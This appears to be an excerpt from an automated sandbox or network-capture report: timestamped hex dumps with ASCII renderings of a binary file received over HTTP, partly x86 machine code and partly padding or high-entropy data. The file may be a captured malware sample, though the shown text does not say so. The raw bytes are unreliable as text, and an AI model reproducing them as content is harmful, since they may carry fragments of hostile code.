ff 48 00 0f 4d 75 a8 48 41 00 70 48 8b 4b 8b 8b 4d 15 4d 48 cc 83 00 28 48 48 a0 ff 0c cc 0c 48 1e ff 00 53 c3 55 48 cc 85 ec c6 48 e8 04 66 d1 0a e8 0c d7 c0 ec 48 4d
                                                                                                                                                                                              Data Ascii: ;pH0HH0T\OJ(#HHA'DtHMH$H(H$HH{$0euHuH0HD 3I9DLX0HT`HH'$HHH@PH^$3HHWu^I#HHHDHMuHApHKMMH(HHHSUHHfHM
                                                                                                                                                                                              2021-09-29 21:45:41 UTC224INData Raw: 00 00 24 0f c0 05 75 84 85 01 db 8b 60 03 89 e1 45 11 50 df 8d 24 48 74 00 30 15 cf 00 c7 15 48 2b 8d 4d 15 8b 89 89 00 4c 15 eb cc d7 83 d9 48 5d 44 c0 d9 00 0d 28 44 8b 8b 9b ff ff 8d 0a 8b 30 70 74 8d 40 fe 57 8b 48 c4 24 85 ff 2b 15 ff bc 15 15 05 ff e5 0c 8d 40 15 c0 89 cc 06 48 ff 8d 83 f4 00 8b 15 ec ff 48 08 5f 90 5c 03 21 8b cc 1b 8b 8d 48 8b 58 eb 00 00 5b 48 c8 5d 48 48 5f 8b 90 57 4f 15 d1 48 8d 48 50 00 10 24 ba 4c 8b ff 8b eb cc 48 18 24 24 da 15 2b 48 41 c0 20 ff ff 00 4c 48 15 00 c9 89 cc 48 8b 24 8c ff 8b 8b 85 15 00 48 f9 38 ff 00 62 48 8b ee 00 13 8b c8 08 54 02 ec 8b 5e 15 24 89 45 39 d8 0f 48 7d 40 4d 15 00 38 c9 00 60 48 8b 00 fe 60 2d c3 8b 00 32 00 1f 63 ff ee 06 00 5d 37 4b e8 83 0f 48 e8 31 3d 4b 1c d9 23 7f 40 4f 0f 8b ec e5 89
                                                                                                                                                                                              Data Ascii: $u`EP$Ht0H+MLH]D(D0pt@WH$+@HH_\!HX[H]HH_WOHHP$LH$$+HA LHH$H8bHT^$E9H}@M8`H`-2c]7KH1=K#@O
                                                                                                                                                                                              2021-09-29 21:45:41 UTC232INData Raw: fe 0d f3 83 00 2f ff 2e e0 48 24 48 5e 9c 00 48 7e 07 01 45 c0 00 30 c0 d2 cc 24 02 5e 48 cb cc 28 48 70 60 6c 18 48 48 00 75 89 83 8d 48 b7 2d 20 49 18 06 83 48 84 b3 1d 30 4c ff 9d f2 40 8b cc 00 00 83 f7 33 13 8b 90 10 67 8b 24 48 15 cc 47 15 15 0e 24 a6 ff 00 48 89 20 bb 8d fc ff 24 58 cc 9a 89 0f 48 c3 0f cc 48 da 18 77 24 ee 10 4c 8d c3 90 85 30 00 00 1c 8b 8b 08 8b ff 48 00 48 00 00 c0 f8 00 08 ff 15 8b 85 55 6e c8 b6 15 e3 cc 4c 53 20 cd ff 00 e9 c4 48 09 50 30 48 84 48 48 8b 8b 28 44 8d 83 4c 48 45 32 48 dc ff df ff 78 ff 49 00 90 16 00 15 0f 8d 90 0f ff 8b 85 13 74 24 4d 60 20 cc b7 cc 8d 8d 8b 21 74 45 b3 24 44 ba 48 fc 78 d2 21 ff 13 cc 00 48 8b 75 40 30 b1 89 89 fa 08 4d 48 0f 02 cc 92 53 cc 8b 40 00 20 c9 27 43 ff cf 5f c7 01 00 f6 6c cc 00
                                                                                                                                                                                              Data Ascii: /.H$H^H~E0$^H(Hp`lHHuH- IH0L@3g$HG$H $XHHw$L0HHUnLS HP0HHH(DLHE2HxIt$M` !tE$DHx!Hu@0MHS@ 'C_l
                                                                                                                                                                                              2021-09-29 21:45:41 UTC240INData Raw: 48 48 5e e8 44 cf 00 8d 01 01 89 8d 05 83 48 00 4c 28 8d 30 00 15 8b 01 85 00 4c 00 66 0e 45 8b 00 89 e8 49 6f 8b e8 48 48 00 ff 09 0f 24 47 4c 1b ff cc e9 41 93 15 8d 48 71 08 18 8b 01 50 1f 04 a9 e8 89 48 ed cc 83 f2 8b ec 48 20 0f 24 28 24 00 8b 48 48 18 48 45 28 cc 4d b9 8d 74 fa ff 50 24 5f 2f d0 8b 00 54 44 7c ff 00 cc 83 ff 0a 00 75 0f 8b 20 00 c3 0f 0f 27 01 14 8d 00 05 e8 07 24 f8 4d f6 ff 00 da 0f 00 24 b9 ff 5b 8b 8b 00 e4 5c ff 48 8d 8b c7 00 83 c0 85 6e 05 5c c7 48 f3 22 c7 ca 23 48 08 40 48 ff 4d 48 71 00 83 cc 01 48 cc 25 f0 d7 ff 48 8c 4d e2 75 cf 24 85 ff f1 67 9b 44 24 48 ff 00 45 48 00 c7 48 48 cc 83 8b 28 3e 74 24 48 54 c7 cc 5f 80 18 53 48 be 03 48 5f 58 7b 02 89 cc 20 0c 08 30 4b 45 2f 48 48 cc ff 48 10 c6 8b 8b ff cc fc 8d 08 8b 15
                                                                                                                                                                                              Data Ascii: HH^DHL(0LfEIoHH$GLAHqPHH $($HHHE(MtP$_/TD|u '$M$[\Hn\H"#H@HMHqH%HMu$gD$HEHHH(>t$HT_SHH_X{ 0KE/HHH
                                                                                                                                                                                              2021-09-29 21:45:41 UTC248INData Raw: 60 04 24 0c ff 1a 3b 4d e8 f5 89 d9 75 83 88 0f 43 c3 10 00 ff 89 62 ff 8b ec 44 08 01 00 00 24 8b 8b 4e c0 48 74 0e 00 8b 24 4d bc 90 ff 05 4b 58 83 08 48 e9 00 24 53 cc 15 ff 3b 2a 5b b8 33 8b 0f 24 cc 21 c9 ff 01 59 8d 8b 48 dc cc 83 00 d8 7e 44 f8 9d ff 8d 01 ec 8b 36 04 48 48 00 ff dc 24 2a 48 c4 2b 33 48 11 8d 8b 4d cf 8b 48 8d 8b 8b 5c 8d 15 de 83 cc 48 c0 15 48 84 45 40 30 10 c3 41 ff 15 4d 48 24 41 ff 00 ff 24 8b 48 00 20 8b fd 83 00 85 00 2c 09 cc 4c 00 8d de 4c da 48 24 eb 5f 48 8b c0 8b 8b 20 07 c7 04 00 00 c2 48 ff 48 10 83 36 ff 45 00 f0 8b 1c ff db 90 48 ff e2 8b 48 cc cc eb 53 48 44 10 ff fe 70 24 5b 8d ff 48 00 8d 10 24 c6 08 15 df 07 68 05 ff 44 44 00 8b 24 f8 90 cc 17 8d 8b ec 83 90 85 e8 55 00 ed 24 18 4c d3 8d 20 48 48 48 74 83 49 48
                                                                                                                                                                                              Data Ascii: `$;MuCbD$NHt$MKXH$S;*[3$!YH~D6HH$*H+3HMH\HHE@0AMH$A$H ,LLH$_H HH6EHHSHDp$[H$hDD$U$L HHHtIH
                                                                                                                                                                                              2021-09-29 21:45:41 UTC256INData Raw: 00 1a 04 10 30 08 45 8d 4c 48 00 89 00 95 c7 ff 48 38 48 ff ec 48 24 8b 89 cc 48 48 ca fb 43 15 f7 00 48 c7 08 c0 03 c7 8d c1 00 78 83 87 00 ff 84 8d 8d 00 cc 48 48 48 8b 00 4d 05 2c e8 2e 8d d0 c7 16 10 13 28 89 00 88 d7 4b ff cc 57 49 44 85 cb 49 4c 1f 48 15 cc a1 8b 71 4d 04 ff ff 95 2b 83 48 4c 90 00 d0 15 cc 00 04 ff 00 15 89 60 ff c3 20 d7 8d eb 24 4c 89 50 f0 50 ff 4c 0c 8b 1d ff e8 fb 00 83 01 8b 0f 10 8d 00 cc bb 8b 42 2c 7f 48 84 4f 73 01 85 90 44 00 00 8b 90 fa ff 24 cc 15 48 ff 00 cc 8b 48 40 40 48 85 48 3a 40 57 90 ec c7 49 30 d2 33 48 cc 00 35 1e 44 09 15 ce 00 c3 30 8d 00 d3 00 cc 48 ff 3b c3 48 48 00 74 00 00 e8 48 1c e8 b9 fd e8 d8 24 48 00 48 cc 48 48 48 ff 8d f5 05 15 0b ff 1c 15 48 74 00 58 c0 5f e0 18 cc 30 8b ff 5f 8d 97 48 8b 38 40
                                                                                                                                                                                              Data Ascii: 0ELHH8HH$HHCHxHHHM,.(KWIDILHqM+HL` $LPPLB,HOsD$HH@@HH:@WI03H5D0H;HHtH$HHHHHHtX_0_H8@
                                                                                                                                                                                              2021-09-29 21:45:41 UTC264INData Raw: 0d ec 9e 06 10 75 02 eb 34 8b 55 fc 8b 45 f4 0f af 04 95 e8 9e 06 10 89 45 f4 8b 4d f4 83 e9 5b 2b 4d 08 66 89 0d 5c 9e 06 10 0f b7 15 5c 9e 06 10 3b 15 f4 9e 06 10 75 02 eb 02 eb b0 a1 e4 9e 06 10 83 e8 5b 2b 05 e4 9e 06 10 a2 58 9e 06 10 68 f8 aa 06 10 68 80 06 00 00 ff 15 1c 10 04 10 89 45 f4 0f b7 0d 5c 9e 06 10 39 4d f4 72 34 0f b7 15 5c 9e 06 10 6b d2 1e 8b 45 08 2b c2 89 45 f4 8b 0d 18 9f 06 10 0f af 4d 08 89 0d 18 9f 06 10 0f b7 15 5c 9e 06 10 6b d2 1e 8b 45 08 2b c2 89 45 f4 ff 35 8c 95 07 10 0f b6 0d 58 9e 06 10 8b 15 e4 9e 06 10 2b d1 03 15 e4 9e 06 10 88 15 58 9e 06 10 0f b7 05 5c 9e 06 10 8b 4d 08 8d 54 08 08 89 55 f4 5e 81 e9 d7 03 00 00 ff e6 c7 45 fc 22 00 00 00 eb 09 8b 45 fc 83 e8 02 89 45 fc 83 7d fc 03 7e 52 8b 4d 08 3b 0d 08 9f 06 10
                                                                                                                                                                                              Data Ascii: u4UEEM[+Mf\\;u[+XhhE\9Mr4\kE+EM\kE+E5X+X\MTU^E"EE}~RM;
                                                                                                                                                                                              2021-09-29 21:45:41 UTC272INData Raw: 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7
                                                                                                                                                                                              Data Ascii: )*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                                                                              2021-09-29 21:45:41 UTC280INData Raw: 61 c4 eb 59 34 fb 3c 37 2b 6b 4f 29 06 1a 21 21 8d a8 b3 4f e1 62 38 7b 00 00 00 00 00 00 20 20 a9 b8 a3 c9 db 1b 1b 00 00 16 16 00 00 00 00 00 00 00 00 ff c1 ff 08 7b de 9f ce 85 3a d9 71 c2 22 da b8 83 30 53 ae ff 00 00 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a d7 67 44 df b7 7a 7d 65 f4 0b a1 ff ff 00 00 ff 5f cc 82 31 e7 21 a6 b4 7d d2 8c 90 d3 79 da e6 82 8e 99 ff ff ff 00 00 1a 1a ff 35 f2 11 15 02 1b ff 00 00 00 00 00 00 7d ba 84 32 ec e0 ff 18 5c 63 2f 2a 53 de ff ff ff 00 00 1b 1b 00 00 17 17 ff ff e9 82 3f ee 91 0a 41 1c 1c 20 2a 03 92 64 19 46 19 e5 93 12 4c 20 00 00 00 00 1e 1e 20 c9 fd a9 d5 76 f4 f4 20 00 00 00 00 20 20 00 00 00 00 20 20 1a 1a 4c 4c 04 cc da 7f f4 ce 97 9b 33 22 ad bd ff ff 00 00 00 00 ff ff 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: aY4<7+kO)!!Ob8{ {:q"0S gDz}e_1!}y5}2\c/*S?A *dFL v LL3"
                                                                                                                                                                                              2021-09-29 21:45:41 UTC288INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cd f3 fd ff 8a e3 fb ff 3b d1 f9 ff 8b e3 fb ff d0 f4 fd ff ff ff ff ff ff ff ff ff e9 fa fe ff 69 db fa ff 71 dd fa ff dd f7 fe ff ff ff ff ff ff ff ff ff d8 f5 fd ff 8c e4 fb ff 3d d1 f9 ff 87 e2 fb ff c5 f1 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                              Data Ascii: ;iq=
                                                                                                                                                                                              2021-09-29 21:45:41 UTC296INData Raw: 00 1b 1b 00 00 00 00 00 00 00 00 00 00 00 f8 55 ca 51 dc 00 1c 1c 1d 1d 68 05 c0 01 da 9e aa 06 50 87 1a f8 45 6d 88 55 24 86 32 20 20 18 18 00 00 ff ff 85 fd 03 93 4d c2 1e c6 d6 df 48 0c 00 00 ff ff 18 18 ff 8e df 09 93 2c 7a 07 10 14 6d ff db 3c 3a ef 4a f9 74 53 ff 00 00 00 00 1b 1b 00 00 16 16 00 04 ad d8 db 7a 4a 00 1e 1e d7 4d 5f 59 a5 17 12 2f 86 64 3d 6d e5 57 a2 ff ff 00 00 ff ff 00 00 81 4d c4 6d 4c e3 61 ff ff 00 00 ff ff 00 00 1a 1a 1a 1a 00 00 00 85 46 67 6c c8 1c 72 dd 46 44 7a 00 00 00 00 00 00 00 18 18 00 00 ff ff 20 20 ff ff 00 00 62 90 fe 98 fa ec b5 ff ff ff ff 00 b4 80 41 53 dd 35 7a 48 8d f1 f8 d6 59 a6 00 21 21 00 00 ff ff 00 3b 63 7b 7a 70 86 c4 b8 00 00 00 1a 1a 00 00 38 06 62 29 33 1a 1a 00 00 00 00 00 00 21 21 18 18 18 49 e5 a5
                                                                                                                                                                                              Data Ascii: UQhPEmU$2 MH,zm<:JtSzJM_Y/d=mWMmLaFglrFDz bAS5zHY!!;c{zp8b)3!!I
                                                                                                                                                                                              2021-09-29 21:45:41 UTC304INData Raw: ff ff 00 00 18 18 19 19 00 00 00 00 20 8b 48 1f 6c 5f 05 20 00 00 00 00 4e b0 0e f0 2c db 85 f0 c5 c6 4c 42 62 30 95 00 00 19 19 00 00 00 00 3a 39 90 e5 94 05 cb 00 00 20 20 00 00 18 b6 55 0d d4 68 4e 75 0e ef c5 0f 18 00 00 00 00 00 00 ff ff 00 00 00 24 64 39 0e a4 b8 0f 00 ff ff d0 ce 10 89 59 a7 59 df 59 50 39 68 70 8e 00 00 ff ff 20 20 00 00 b2 3b 4e 7b d6 09 37 29 00 00 00 00 00 00 1e 1e 00 00 00 00 00 00 00 49 fa cf 89 97 00 ff ff 00 00 00 00 00 00 00 00 ff ff ff ff 21 21 00 00 0e 55 4e 99 ff 21 70 61 27 67 c1 fd 92 92 ae 74 06 80 c1 20 20 20 20 00 c0 50 b9 a3 bd 76 51 16 9d ff 4d 4a 00 16 16 00 00 1e 1e fe 75 30 49 a3 c6 a3 b7 d3 51 23 dd e4 bd 94 15 67 0c f9 46 fe 00 00 16 16 16 16 99 b5 3b 49 58 39 00 00 18 18 00 00 00 00 00 00 00 00 d6 af 3b 20
                                                                                                                                                                                              Data Ascii: Hl_ N,LBb0:9 UhNu$d9YYYP9hp ;N{7)I!!UN!pa'gt PvQMJu0IQ#gF;IX9;
                                                                                                                                                                                              2021-09-29 21:45:41 UTC312INData Raw: f8 00 fe 00 d6 00 fe 00 d6 00 ff 20 00 00 fe 00 fe 00 ff 00 fd 4c 00 d6 65 00 d6 00 00 ff ff 00 33 00 fe 00 00 00 ff ff f8 fd ff 00 fe fe ff ff ff ff ff 00 fe fe fe ff 32 d5 0b fe fe 00 00 2f ff ff fe ff ff 00 fe ff ff ff 32 d5 00 00 00 fe ff 75 fb 00 ff fe 01 fe 00 68 d0 00 00 fe 00 32 44 00 fe 00 ff fe 00 00 ff 3e ff 00 fe 33 ff fe ff 00 65 ff ff fe fe ff fe fe ff 32 fe ff ff 00 fc fe 00 00 00 00 00 00 fe 7d 00 ff 00 fe fb 7f 00 00 00 00 98 ff ff fe fe fe ff 00 00 00 ff fe 00 00 3a fe 00 ff 32 fe 00 fe ff fe ff 00 32 00 d3 ff fe ff ff 33 0d ff ff ff 00 d5 33 00 00 dd d6 33 00 00 ff 00 d6 cf fe 00 00 fe 66 d5 00 ff 00 32 e0 33 00 00 00 00 d5 fe ff fe f8 00 ff 00 ff 00 00 65 ff ff 00 23 fa f9 ff 00 ff 00 00 00 1f ff 00 ff 33 ff 00 65 00 d5 00 fe fe 00 02
                                                                                                                                                                                              Data Ascii: Le32/2uh2D>3e2}:22333f23e#3e
                                                                                                                                                                                              2021-09-29 21:45:41 UTC320INData Raw: ba 85 17 00 00 00 21 21 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 e7 88 76 ef 02 ab a4 0b 1b fe f1 00 00 16 16 21 c6 be f3 86 e6 0e 8e 21 00 00 ff ff 21 21 00 4b dc 99 8a 1f 35 51 99 f9 a3 af c1 d5 ae 00 00 00 ff ff 00 00 4d d7 52 f0 16 bb 98 a1 1f 1f 16 16 ff ff 00 00 1d 1d 00 00 43 03 5f 4a 99 20 20 1a a9 c2 5c 2e 88 54 bb 1f a3 73 77 b1 16 43 8c 78 7e 5b 2a 1a ff ff 00 00 21 21 ff ca 6a 40 f5 ef a4 5c 43 f5 ac 41 ae ff 00 00 00 00 ff ff 00 00 00 00 ff ff 00 00 8d 25 fe 33 e5 aa 35 48 11 ce 09 9f 71 74 db 2b 6b 77 0d 00 00 1b 1b ff ff 00 00 00 00 00 00 00 00 1e 1e 00 00 00 57 a8 b1 41 24 98 00 00 00 00 00 e8 8e ee a9 58 83 93 c1 96 d5 45 a8 53 0d 35 1c 1c 1c 1c 1e 1e 00 00 4e 82 45 4d d0 55 68 00 00 1e 1e 00 00 18 bb 88 f2 51 db 49 e3 0b 91 da 0d 18 00
                                                                                                                                                                                              Data Ascii: !!v!!!!K5QMRC_J \.TswCx~[*!!j@\CA%35Hqt+kwWA$XES5NEMUhQI
                                                                                                                                                                                              2021-09-29 21:45:41 UTC328INData Raw: a8 d5 8e 4a 10 5b 49 ff 00 00 ff ff 00 00 00 53 9b 02 cb d3 00 16 16 00 00 00 00 18 18 ff ff 00 00 00 00 9c 4e 78 5e c7 9c ae 53 c8 0f 92 57 63 5c f6 21 e1 24 09 00 00 00 00 00 00 00 00 1b 1b ff ff ff ff 1d 1d 00 00 00 a3 ec c4 84 07 a9 24 b8 7c 05 e2 47 00 21 21 16 16 a5 a8 a4 7b db 61 b6 0c 52 49 d1 b0 ec 90 ea 0e 75 68 80 ff ff 1a 1a 00 00 00 00 60 c0 df 73 ef 60 20 20 00 00 1f 1f 00 2c 48 56 e2 4a 95 f4 d8 55 83 0a bc 94 3c 50 00 00 00 1b 1b 00 00 00 00 ff ff 18 03 f5 d4 71 b7 d1 85 18 00 00 22 2d 93 94 ec 0a ed c2 61 85 01 18 18 1d 1d 00 00 ff ff d1 2f ff 5d ac 56 5d 00 00 00 00 00 00 ff ff 00 00 20 20 00 00 00 fd a9 5d 00 11 49 5c 05 cf b2 8c 5f 4c 65 00 00 00 16 16 ff ff 00 00 00 00 00 00 00 00 1e 1e 00 00 07 eb fc ab 58 10 a0 36 00 00 1b 1b 00 1a
                                                                                                                                                                                              Data Ascii: J[ISNx^SWc\!$$|G!!{aRIuh`s` ,HVJU<Pq"-a/]V] ]I\_LeX6
                                                                                                                                                                                              2021-09-29 21:45:41 UTC336INData Raw: 00 00 00 00 00 00 00 ff ff 00 00 1e 1e ff 38 fd 18 3b c3 bf dd ff 00 00 ff ff d2 b4 93 45 48 c7 d8 d4 be 3b 4f 00 00 1c 1c 21 21 00 00 83 b6 87 c8 6b 8b e2 00 00 00 00 00 00 00 28 b1 4b af aa b3 5a 90 d1 03 29 5a 4f 35 00 ff ff 00 00 00 00 1c 1c 16 16 ff bd 0f d9 11 3a c9 a5 d0 ff 20 20 42 91 72 34 d0 00 00 00 00 1a 1a 00 00 dc 3a 6e e0 78 c4 28 7c e2 aa 9a aa 02 24 3d 1b fd 55 1a 18 18 fe fe 00 00 00 00 00 00 00 00 00 00 ff 7d ef 80 3b c6 98 94 12 52 ff 47 1b ff 00 00 00 00 00 00 20 20 00 00 00 00 00 00 ff ff 18 18 c3 6c 83 04 a9 3e 40 55 ce c8 45 59 7f dc bc d3 fc ad 95 1c 1c 00 00 00 c7 1b e9 6b ed 64 00 00 00 19 19 21 21 00 dc a5 a4 de 35 95 9d 79 55 b3 5f 71 1b ca f3 00 00 00 00 00 00 00 86 2e dc 88 91 24 8e 00 00 00 00 ff ff 00 00 ff ff ff ff d4 1b
                                                                                                                                                                                              Data Ascii: 8;EH;O!!k(KZ)ZO5: Br4:nx(|$=U};RG l>@UEYkd!!5yU_q.$
                                                                                                                                                                                              2021-09-29 21:45:41 UTC344INData Raw: ff 00 00 ff ff 68 1f 0d fc 4d 28 05 6b 7d 4b 7e 16 51 73 9a 1b 1b ff 18 74 21 c1 49 7d 13 ff 21 21 19 19 19 19 00 35 24 d6 87 7d 61 74 4c af 92 72 00 00 00 00 00 1e 1e ff ff 00 00 20 20 00 00 c9 17 5a 5f 1a 99 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 16 21 cd f8 d1 10 b2 5c 1f 2e 3d ae b1 5c 03 4c 21 18 18 00 00 07 f5 fd 8e 09 1c cf a4 00 00 16 16 00 00 00 00 e3 da b3 0a 83 00 00 00 00 1e 1e ff 44 60 76 fb 79 d9 4a 61 ad 33 db 42 1a b4 ed 9e 51 4f 3f ff ff ff 00 00 1b 1b 00 00 1b 1b 16 d3 48 32 78 79 03 40 96 39 c2 57 f5 16 00 00 55 07 ee 88 15 8f 5c 33 04 52 00 62 f5 0b 7d b9 ec 9d 35 00 00 21 21 1e 1e 00 00 cf e0 36 5a d6 74 ff ff 17 17 00 00 00 00 00 00 1e 1e 21 21 00 3a 5c 17 03 68 4c 75 f3 3c 94 c6 d1 4c 2b f2 00 20 20 1a 1a 00 00 00 00
                                                                                                                                                                                              Data Ascii: hM(k}K~Qst!I}!!5$}atLr Z_!\.=\L!D`vyJa3BQO?H2xy@9WU\3Rb}5!!6Zt!!:\hLu<L+
                                                                                                                                                                                              2021-09-29 21:45:41 UTC352INData Raw: 19 ff 01 76 fe ff 65 00 ff 32 00 48 fe fe f5 00 fe 00 ff ff ff fe ff 00 ff 00 fe 33 c9 fe fe fe fe 66 00 00 ff d5 cd e2 00 fe fe 33 ff fe fe 3d 57 fe ff cf 00 ff ea 00 00 fe ff 00 00 fb 00 65 ff fe f8 ff fe ff fe ff 00 c7 00 00 ff f5 00 fe ff fe 00 fe 00 ff 00 00 00 66 00 00 3e d1 fe ff fe fe fe 00 00 fe 00 fe ff fe 00 00 e2 ff 00 65 ff 00 49 00 32 ff fe 00 00 00 fe 65 ff f1 ff 00 00 00 ff ff 51 fe 33 00 fe ff 00 00 00 7d 47 33 4e f6 6b 00 16 16 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 54 6d a9 74 ea c3 86 83 c6 16 79 5e 25 3f c2 16 16 00 00 20 c7 7d e7 fb af 60 8d 20 16 16 00 00 00 00 ff 63 c9 48 17 eb bc 00 d4 f6 50 dd ff 00 00 ff ff 20 20 28 df 91 9e ab e2 92 ff ff ff ff 00 00 00 00 ff ff 00 00 5e 8e e7 c8 f0 46 68 86 8a d8 60 b4 36 7b 00 00 00
                                                                                                                                                                                              Data Ascii: ve2H3f3=Wef>eI2eQ3}G3NkTmty^%? }` cHP (^Fh`6{
                                                                                                                                                                                              2021-09-29 21:45:41 UTC360INData Raw: ff 00 ff fe 00 ff fe 82 00 fe ff fe fe ff a9 fe ff d5 fe ff fe eb a5 c0 fe 00 ff fe 00 ff d5 ff 00 e6 60 00 00 ff ff fe fe fb 33 ff cf fe ff 00 00 fe ff 00 00 66 00 00 fb 00 00 00 ff fe fe fe ff 38 00 00 ff ff 0f dc fb 00 ff d6 ff f6 ff fe fe fe 00 fb 00 fe ff d5 00 00 00 fe 00 00 00 fe fe f1 ff ff fe fe ff 00 e8 ff 33 00 93 fe 00 00 ff 00 ff ff d6 fd 00 fe 6f fe fe 00 00 66 ff 33 fe ef fe ff 65 00 ff fe 00 6b 00 ff ff fa ff ff 00 00 00 f9 00 00 fe fe ff fe 00 66 00 00 00 f8 fe fe 66 fe fe 33 00 65 10 00 32 fe 00 00 00 00 00 00 ff 00 ff fe 00 d1 00 00 33 00 fe fe d6 fe fe ff 00 fe ff fe d6 00 fe 00 65 65 51 ff 00 00 ff fe 00 ff 00 ff 00 00 00 00 00 cd 00 ff 8c fe 07 00 cf 00 ff 00 00 00 00 ff d4 00 ff ff 65 00 c8 33 33 fe 00 33 ff fe fe 00 00 fe fe fe ff
                                                                                                                                                                                              Data Ascii: `3f83of3ekff3e23eeQe333
                                                                                                                                                                                              2021-09-29 21:45:41 UTC368INData Raw: cf 7e 59 2a a7 00 00 00 00 00 00 20 20 00 00 ff ff 1c 1c 00 1d be 91 40 2e 16 00 16 16 00 00 00 00 00 00 00 00 00 00 18 18 1a 1a ff ff e3 63 57 4f a3 a1 41 ce 8b 88 05 c8 25 e4 32 00 00 18 18 21 86 e6 6d 59 52 45 74 21 20 20 00 00 1e 1e ff c0 94 58 90 d6 58 f3 a8 43 d4 c9 ff 00 00 00 00 ff ff df c5 97 ac a8 58 a4 1a 1a 00 00 16 16 ff ff 00 00 00 00 e8 42 de d4 23 c6 15 ff 69 5d 45 2d 90 52 1d 1d 00 10 63 40 ab c0 46 7c 7c 00 ff ff 16 16 00 00 00 fc 48 4d 67 4d 00 1f 1f 00 00 00 00 20 20 00 00 16 16 00 00 1c bb f1 b2 c5 1c ca 99 ad 15 fd 01 f1 a7 69 b9 75 60 d7 00 00 ff ff ff ff 1b 1b 1c 1c 00 00 00 00 ff ff 00 00 00 6c 95 50 bb d7 3b 62 87 91 87 9e 92 00 00 00 1c 1c be 92 c4 e9 b8 31 42 2d 13 27 b8 7c 49 6a c7 1f f7 06 b3 21 21 ff ff 00 00 00 00 61 c3 68
                                                                                                                                                                                              Data Ascii: ~Y* @.cWOA%2!mYREt! XXCXB#i]E-Rc@F||HMgM iu`lP;b1B-'|Ij!!ah
                                                                                                                                                                                              2021-09-29 21:45:41 UTC376INData Raw: 33 d5 00 1a 00 fb 66 00 e0 fe 33 cf 00 ff ff 33 ff 54 ff 00 fe 00 f1 ff ff fe ff 32 32 a0 ff d1 fe 00 33 00 2c 00 ff fe ff fe 00 00 ff b9 67 ff 00 00 00 f7 00 00 ff ff aa ff ff d4 cb fe 00 00 ff fe ff 00 24 ff ff fe ff 00 00 32 00 00 00 ff 00 00 32 00 d5 00 96 ff fe 00 ff 00 fb de ff 00 33 00 ff ae ff d2 00 fe ff ff 00 03 ff fe fe ff fe fe fe 9c d6 d8 00 fe d6 00 13 fe ff 04 00 33 fe 00 ff 00 3b 32 fe fe 00 ff 9f 00 00 33 00 00 f1 ff ff 00 fe fe fe fe 00 f9 d5 ff ff fe 00 ff fe cc ff fe 65 f8 00 ff ff ff ff 00 f9 fe fe e1 ff 00 33 00 e1 00 fe ef 33 00 00 33 00 ff 32 ed ff fe ff 00 ff 00 fe fe ff 00 00 00 00 33 fe ff fe 32 df ff ff 00 32 00 ff 00 00 00 00 fe 00 ff aa 00 66 ff ff fc cf 00 00 ff 00 dd fe ff 00 00 fe 32 32 00 d6 ff fe ff ff ff 00 00 ff fe 33
                                                                                                                                                                                              Data Ascii: 3f33T223,g$2233;23e3332322f223
                                                                                                                                                                                              2021-09-29 21:45:41 UTC384INData Raw: 27 ff 00 00 00 ff 00 00 ff 00 e8 e6 00 02 fe ff fe 00 00 00 ff 00 00 00 00 d6 fe 00 66 00 fe fe fe 5d ff 33 33 ff ff fe 33 0c 00 00 ff 00 ff fe e0 d6 2e 33 ff 00 52 fe 01 ff fe 04 00 fe 6b ff ff ff d5 00 00 e7 ff fe e6 00 00 ff ff ff b8 ff ff 00 80 fe fe 00 d6 ff 0f 00 fa ff 00 00 00 ff ff ff 32 ff 00 fe fe d6 ff fe 00 fe 3b 00 ff d6 fe 33 fe ff fe ff 00 ff fe 00 ff ff 65 fe 00 00 00 00 00 ff ff cf cb 90 fe 2c 00 66 fe 20 66 00 cd ff 00 fe 00 00 0b fe 00 fd 80 fe 3a fe f8 ef ff ff 65 ca ff ff 5d c5 65 00 00 ff 00 ff 66 00 ff 66 47 fe fe 00 ea bb 3f fe ff ff dc 00 00 ff 33 ff 02 33 8e 00 fe ff d6 00 e3 00 21 fe c5 fe ff 33 00 00 00 d6 fb e1 00 00 00 00 66 01 ff ff ff fe 00 00 33 fe fe fe fe ff 00 00 f7 00 fe 00 ff 00 ff ff fe 5f 88 00 fe 00 00 00 fe 00 ff
